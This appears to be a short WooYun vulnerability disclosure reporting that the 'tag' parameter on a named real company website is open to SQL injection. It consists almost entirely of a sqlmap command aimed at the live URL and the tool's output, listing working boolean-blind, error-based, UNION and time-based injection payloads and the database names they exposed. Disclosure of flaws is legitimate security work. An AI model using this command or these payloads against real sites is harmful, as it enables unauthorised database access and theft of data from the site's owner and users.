WooYun.org

tag参数未过滤，导致sql注入！
python sqlmap.py -u "http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB" --batch --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tag
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' AND 6328=6328 AND 'WCJo'='WCJo
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' AND (SELECT 6895 FROM(SELECT COUNT(*),CONCAT(0x7169717a71,(SELECT (CASE WHEN (6895=6895) THEN 1 ELSE 0 END)),0x716d6b6571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UBWQ'='UBWQ
    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169717a71,0x424b7269755743637557,0x716d6b6571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: q=interface/getfaq&tag=-7577' OR 8125=SLEEP(5) AND 'YjZb'='YjZb
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] oppo_www